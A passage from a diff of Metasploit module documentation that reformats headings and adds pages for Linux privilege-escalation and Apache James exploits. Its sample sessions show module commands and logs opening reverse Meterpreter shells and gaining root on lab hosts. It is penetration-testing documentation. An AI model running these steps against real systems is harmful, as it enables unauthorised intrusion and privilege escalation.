 * Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)

documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md

@@ -12,7 +12,7 @@ The following versions of SenNet Data Logger and Electricity Meters, monitoring
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/telnet/satel_cmd_exec

documentation/modules/auxiliary/server/browser_autopwn2.md

@@ -1,7 +1,7 @@
 Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and
 feel different for you. Here are the features you should know about before using.
 
-## Vulnerable Applications
+## Vulnerable Application
 
 Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:
 

documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 
 This module exploits a SQLi vulnerability found in
 OpenEMR version 5.0.1 Patch 6 and lower. The
@@ -10,18 +10,6 @@ This module saves each table as a `.csv` file in your
 loot directory and has been tested with
 OpenEMR 5.0.1 (3).
 
-
-## Author
-
-Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security
-
-
-## References
-
-https://www.cvedetails.com/cve/CVE-2018-17179/
-https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617
-
-
 ## Options
 
 ```
@@ -39,7 +27,7 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
    VHOST                       no        HTTP server virtual host
 ```
 
-## Usage
+## Scenarios
 
 This module has both `check` and `run` functions.
 

documentation/modules/exploit/android/local/su_exec.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 This module uses the su binary present on rooted devices to run a payload as root.
 
@@ -8,12 +8,10 @@ temporary directory, make it executable, execute it in the background, and final
 
 On most devices the su binary will pop-up a prompt on the device asking the user for permission.
 
-## Vulnerable Application
-
 This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
 Many devices can be rooted by flashing new firmware, however the existing data will be lost.
 
-## Verfication steps
+## Scenarios
 
 You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
 

documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md

@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description
 
 This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
 
-## Setup
+### Setup
 
 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-## Targets
+### Targets
 
 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
 ```
 
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options
 
 **RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.
 
 **PAYLOAD**
 
-Set this to a BSD VAX payload. Currently only
+Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.
 
-## Usage
+## Scenarios
+
+### `fingerd` 5.1 on 4.3BSD
 
 ```
-msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+msf5 > use exploit/bsd/finger/morris_fingerd_bof
+msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
 
 Module options (exploit/bsd/finger/morris_fingerd_bof):
 
    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   79               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
 
 
 Payload options (bsd/vax/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-
+   LHOST                   yes       The listen address (an interface may be specified)
 
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(bsd/finger/morris_fingerd_bof) > run
 
-[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Started reverse TCP handler on 192.168.56.1:4444
 [*] 127.0.0.1:79 - Connecting to fingerd
 [*] 127.0.0.1:79 - Sending 533-byte buffer
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600
 
-whoami
-nobody
+who am i
+nobody   tty??   Feb  6 13:45
 cat /etc/motd
 4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986
 

documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md

@@ -35,7 +35,7 @@ Change dictory to CVE-2017-1263X, and run `docker-compose up -d`
   9. Do: ``exploit``
   10. You should get a shell.
 
-## Options   
+## Options
 
 - URIPATH
 

documentation/modules/exploit/linux/http/cisco_rv32x_rce.md

@@ -40,28 +40,34 @@ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2
 ## Options
 
 **RHOSTS**
+
 Configure the remote vulnerable system.
 
 **RPORT**
+
 Configure the TCP port of the HTTP/HTTPS management web interface.
 
 **USE_SSL**
+
 This flag controls whether the remote management web interface is accessible
 via HTTPS or not. Should be false for HTTP and true for HTTPS.
 
 **PAYLOAD**
+
 Configure the Metasploit payload that you want to stage. Must be for MIPS64
 arch.  Set payload Options accordingly.
 
 **SRVHOST**
+
 The module stages the payload via a web server. This is the binding interface
 IP. Default can be set to 0.0.0.0. 
 
 **HTTPDelay**
+
 This configures how long the module should wait for the incoming HTTP
 connection to the HTTP stager.
 
-## Verification Steps:
+## Verification Steps
 
 1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
 2. Start `msfconsole`:
@@ -74,7 +80,7 @@ connection to the HTTP stager.
 9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.
 
 
-## Scenario
+## Scenarios
 
 Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
 interface on TCP port 443: 

documentation/modules/exploit/linux/http/cisco_ucs_rce.md

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 
 The Cisco UCS Director virtual appliance contains two flaws that can be combined
 and abused by an attacker to achieve remote code execution as root.
@@ -16,21 +16,7 @@ Note that Cisco also mentions in their advisory that their IMC Supervisor and
 UCS Director Express are also affected by these vulnerabilities, but this module
 was not tested with those products.
 
-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
-FULL_DISC
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
-
-
-## Usage
+## Scenarios
 
 Setup RHOST, LHOST, LPORT and run it!
 

documentation/modules/exploit/linux/http/dcos_marathon.md

@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
@@ -155,7 +155,7 @@ in the DCOS cluster.
 - [ ] Verify it creates a docker container and it successfully runs
 - [ ] After a minute a session should be opened from the agent server
 
-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/dcos_marathon
 msf exploit(dcos_marathon) > set RHOST 192.168.0.9

documentation/modules/exploit/linux/http/docker_daemon_tcp.md

@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
 with tls but without tls-auth), an attacker can create a Docker
 container with the '/' path mounted with read/write permissions on the
@@ -85,7 +85,7 @@ to gain root access to the hosting server of the Docker container.
 - [ ] Verify it creates a Docker container and it successfully runs
 - [ ] After a minute a session should be opened from the Docker server
 
-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/docker_daemon_tcp
 msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23

documentation/modules/exploit/linux/http/epmp1000_get_chart_cmd_shell.md

@@ -10,7 +10,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use use exploit/unix/http/epmp1000_get_chart_cmd_shell

documentation/modules/exploit/linux/http/epmp1000_ping_cmd_shell.md

@@ -12,7 +12,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use use exploit/unix/http/epmp1000_ping_cmd_shell

documentation/modules/exploit/linux/http/goautodial_3_rce_code_injection.md

@@ -9,7 +9,7 @@ Refer to: https://www.exploit-db.com/exploits/36807/
 
 NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well).  This can cause bind payloads to quietly fail.  For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - Do `use exploit/linux/http/goautodial_3_rce_command_injection`

documentation/modules/exploit/linux/http/nagios_xi_magpie_debug.md

@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 
 Nagios XI 5.5.6 Root Remote Code Execution
 
@@ -14,7 +14,7 @@ The exploit works as follows:
 - Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
 - Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).
 
-# Verification Steps
+## Verification Steps
 
 1. `use exploit/linux/http/nagios_xi_root_rce`
 2. `set RHOSTS [IP]`
@@ -23,7 +23,7 @@ The exploit works as follows:
 
 A meterpreter session should have been opened successfully and you should be root
 
-# Options
+## Options
 
 ## RSRVHOST
 
@@ -41,7 +41,7 @@ IP of your local HTTPS server (must be a local IP).
 
 Port to listen to for your local HTTPS server.
 
-# Scenarios
+## Scenarios
 
 ## Nagios 5.5.6 on Ubuntu 18.04 LTS
 

documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md

@@ -13,7 +13,7 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
   5. Do : `run`
   6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
 
-## Scenarious
+## Scenarios
 
 Sample output of a successfull exploitation should be look like this :
 

documentation/modules/exploit/linux/http/pineapple_bypass_cmdinject.md

@@ -1,4 +1,4 @@
-## Background
+## Vulnerable Application
 
 The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
 pre-authorized CSS files, which allows the attacker to bypass
@@ -9,7 +9,7 @@ This exploit uses a utility function in
 /components/system/configuration/functions.php to execute commands once
 authorization has been bypassed.
 
-## Verification
+## Verification Steps
 
 This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
 default options are generally effective due to having a set state after being

documentation/modules/exploit/linux/http/pineapple_preconfig_cmdinject.md

@@ -1,4 +1,4 @@
-## Background
+## Vulnerable Application
 
 This module uses a challenge solver exploit which impacts two possible states
 of the device: pre-password set and post-password set. The pre-password set
@@ -16,7 +16,7 @@ This exploit uses a utility function in
 /components/system/configuration/functions.php to execute commands once
 authorization has been bypassed.
 
-## Verification
+## Verification Steps
 
 This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
 default options are generally effective due to having a set state after being

documentation/modules/exploit/linux/http/rancher_server.md

@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Rancher Server, an attacker can create a docker container
 with the '/' path mounted with read/write permissions on the host
 server that is running the docker container. As the docker container
@@ -107,7 +107,7 @@ Advanced Options
 - [ ] Verify it creates a docker container and it successfully runs 
 - [ ] After a minute a session should be opened from the agent server
 
-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/rancher_server
 msf exploit(rancher_server) > set RHOST 192.168.91.111

documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md

@@ -47,7 +47,7 @@ Samsung NVR Recorder SRN-1670D is a hardware:
 
 http://www.samsungcc.com.au/cctv/ip-nvr-solution/samsung-dvr-srn-1670d
 
-## Scenario
+## Scenarios
 
 ```
 msf exploit(samsung_srv_1670d_upload_exec) > show options 

documentation/modules/exploit/linux/http/spark_unauth_rce.md

@@ -3,7 +3,7 @@
 This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
 It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
 
-## Vulnerable Application 
+## Verification Steps
 
 https://github.com/vulhub/vulhub/tree/master/spark/unacc 
 

documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md

@@ -23,13 +23,9 @@
 
   * Linux Mint 17.3 (x86_64)
   * Linux Mint 18 (x86_64)
+  * Ubuntu 16.04 (x86_64)
   * Ubuntu 16.04.2 (x86_64)
 
-  With kernel versions:
-
-  * 4.4.0-45-generic
-  * 4.4.0-51-generic
-
 
 ## Verification Steps
 
@@ -67,6 +63,19 @@
   and fall back to uploading a pre-compiled binary.
 
 
+## Compiled Executable
+
+The module makes use of a pre-compiled exploit executable to be
+used when `gcc` is not available on the target host for live compiling,
+or `COMPILE` is set to `False`.
+
+The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).
+
+```bash
+./x86_64-linux-musl-gcc -o chocobo_root -s -pie -static chocobo_root.c
+```
+
+
 ## Scenarios
 
   ```

documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md

@@ -1,8 +1,10 @@
-## Description
+## Vulnerable Application
 
-This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
+This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute
+a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root.
+It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
 
-## Demo
+## Scenarios
 
 ```
 msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
@@ -19,4 +21,3 @@ meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
 meterpreter > 
 ```
-

documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md

@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+  [Diamorphine](https://github.com/m0nad/Diamorphine) is a Linux Kernel Module (LKM) rootkit.
+
+  This module uses Diamorphine rootkit's privesc feature using signal
+  64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+  This module has been tested successfully with Diamorphine from `master`
+  branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SIGNAL**
+
+  Diamorphine elevate signal. (default: `64`)
+
+
+## Scenarios
+
+### Linux Mint 19 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
+
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
+  [*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.228
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.228
+  OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+

documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md

@@ -1,8 +1,8 @@
-# Vulnerable Application
+## Vulnerable Application
 
 Exim 4.87 - 4.91 Local Privilege Escalation
 
-This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 
+This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).
 
 Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.
 
@@ -15,7 +15,7 @@ Be careful if you use the exim package from the official repo of your Linux dist
 
 Before using the exploit, make sure exim is actually listening on a port (it may sound stupid, but I struggled a bit when creating a testing environment). However, you should not have any problem if you use the Docker image linked above.
 
-# Verification Steps
+## Verification Steps
 
 1. `use exploit/linux/local/exim4_deliver_message_priv_esc`
 2. `set SESSION [session]`
@@ -24,7 +24,7 @@ Before using the exploit, make sure exim is actually listening on a port (it may
 5. `set LPORT [lport]`
 6. `exploit`
 
-# Options
+## Options
 
 ## PAYLOAD
 
@@ -37,26 +37,26 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
 ## ForceExploit
 
 Force exploit even if the current session is root.
-    
-## SendExpectTimeout
 
-Timeout per send/expect when communicating with exim.
+## ExpectTimeout
+
+Timeout for Expect when communicating with exim.
 
 ## WritableDir
 
 A directory where we can write files (default is /tmp).
 
 
-# Scenarios
+## Scenarios
 
 ## Privilege escalation starting with a meterpreter shell
 
 ```
 meterpreter > getuid
 Server username: uid=1000, gid=1000, euid=1000, egid=1000
-meterpreter > 
-Background session 1? [y/N]  
-msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
+meterpreter >
+Background session 1? [y/N]
+msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
 session => 1
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
 [*] The target appears to be vulnerable.
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
 
-[*] Started reverse TCP handler on 192.168.0.50:13371 
+[*] Started reverse TCP handler on 192.168.0.50:13371
 [*] Payload sent, wait a few seconds...
 [*] Sending stage (985320 bytes) to 192.168.0.80
 [*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100

documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md

@@ -0,0 +1,129 @@
+## Description
+
+  This module attempts to gain root privileges on Linux systems by abusing
+  a NULL pointer dereference in the `rds_atomic_free_op` function in the
+  Reliable Datagram Sockets (RDS) kernel module (rds.ko).
+
+  Successful exploitation requires the RDS kernel module to be loaded.
+  If the RDS module is not blacklisted (default); then it will be loaded
+  automatically.
+
+  This exploit supports 64-bit Ubuntu Linux systems, including distributions
+  based on Ubuntu, such as Linux Mint and Zorin OS.
+
+  Target offsets are available for:
+
+  Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
+  Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.
+
+  This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
+  Failed exploitation may crash the kernel.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on various 4.4 and 4.8 kernels.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+  **COMPILE**
+
+  Options: `Auto` `True` `False` (default: `Auto`)
+
+  Whether the exploit should be live compiled with `gcc` on the target system,
+  or uploaded as a pre-compiled binary.
+
+  `Auto` will first determine if `gcc` is installed to compile live on the system,
+  and fall back to uploading a pre-compiled executable.
+
+
+## Scenarios
+
+### Ubuntu 16.04 kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu
+
+  ```
+  msf5 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc 
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check
+
+  [+] System architecture x86_64 is supported
+  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
+  [+] SMAP is not enabled
+  [+] LKRG is not installed
+  [+] grsecurity is not in use
+  [+] rds.ko kernel module is loaded
+  [*] The target appears to be vulnerable.
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] System architecture x86_64 is supported
+  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
+  [+] SMAP is not enabled
+  [+] LKRG is not installed
+  [+] grsecurity is not in use
+  [+] rds.ko kernel module is loaded
+  [+] gcc is installed
+  [*] Live compiling exploit on system...
+  [*] Writing '/tmp/.zwl2ezPl' (250 bytes) ...
+  [*] Launching exploit (timeout: 30)...
+  [*] Transmitting intermediate stager...(126 bytes)
+  [*] Sending stage (3021284 bytes) to 172.16.191.206
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.206:48130) at 2019-12-21 02:22:40 -0500
+  [+] Deleted /tmp/.aCNiWb9vps
+  [+] Deleted /tmp/.zwl2ezPl
+  [*] Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+  [*] [.] checking kernel version...
+  [*] [.] kernel version '4.8.0-51-lowlatency #54~16.04.1-Ubuntu' detected
+  [*] [~] done, version looks good
+  [*] [.] checking system...
+  [*] [~] done, looks good
+  [*] [.] mapping null address...
+  [*] [~] done, mapped null address
+  [*] [.] KASLR bypass enabled, getting kernel base address
+  [*] [.] trying /proc/kallsyms...
+  [*] [-] kernel base not found in /proc/kallsyms
+  [*] [.] trying syslog...
+  [*] [.] done, kernel text:   ffffffffa7c00000
+  [*] [.] commit_creds:        ffffffffa7ca6ed0
+  [*] [.] prepare_kernel_cred: ffffffffa7ca72e0
+  [*] [.] mmapping fake stack...
+  [*] [~] done, fake stack mmapped
+  [*] [.] executing payload 0x4027f7...
+  [*] [+] got root
+
+  meterpreter > getuid 
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.206
+  OS           : Ubuntu 16.04 (Linux 4.8.0-51-lowlatency)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+

documentation/modules/exploit/linux/redis/redis_unauth_exec.md

@@ -17,7 +17,7 @@ docker pull redis
 docker run -p 6379:6379 -d --name redis_slave redis
 ```
 
-## Options   
+## Options
 
 - CUSTOM
 

documentation/modules/exploit/linux/smtp/apache_james_exec.md

@@ -0,0 +1,155 @@
+## Vulnerable Application
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
+  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
+  Instructions for installing the vulnerable application for testing can be found here:
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
+
+## Verification Steps
+  __1.__ Start msfconsole
+
+  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec
+
+  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport
+
+  __4.__ DO: Set the preferred payload
+
+  __5.__ DO: Run the check method to determine vulnerability
+
+  __6.__ DO: Run the exploit
+
+  __7.__ The payload will connect to the listener if the exploit is successful
+
+## Options
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
+
+  **RHOSTS:**  The IP address of the vulnerable server.
+
+  **RPORT:**  The port number of the SMTP service.
+
+  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
+
+## Scenarios
+  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
+  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
+  mail objects.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
+  target => 1
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
+  rhosts =>  192.168.224.169
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+  
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
+  [*] Sending stage (3021284 bytes) to 192.168.224.169
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
+  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
+
+  meterpreter >
+```
+
+  ---------------------------------------------------------------------------------------------
+  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
+  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
+  /etc/bash_completion.d directory and the malicious user account.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
+  rhosts => 192.168.224.164
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
+```
+
+  __5.__ Set up and run listener (Can be done before running exploit):
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
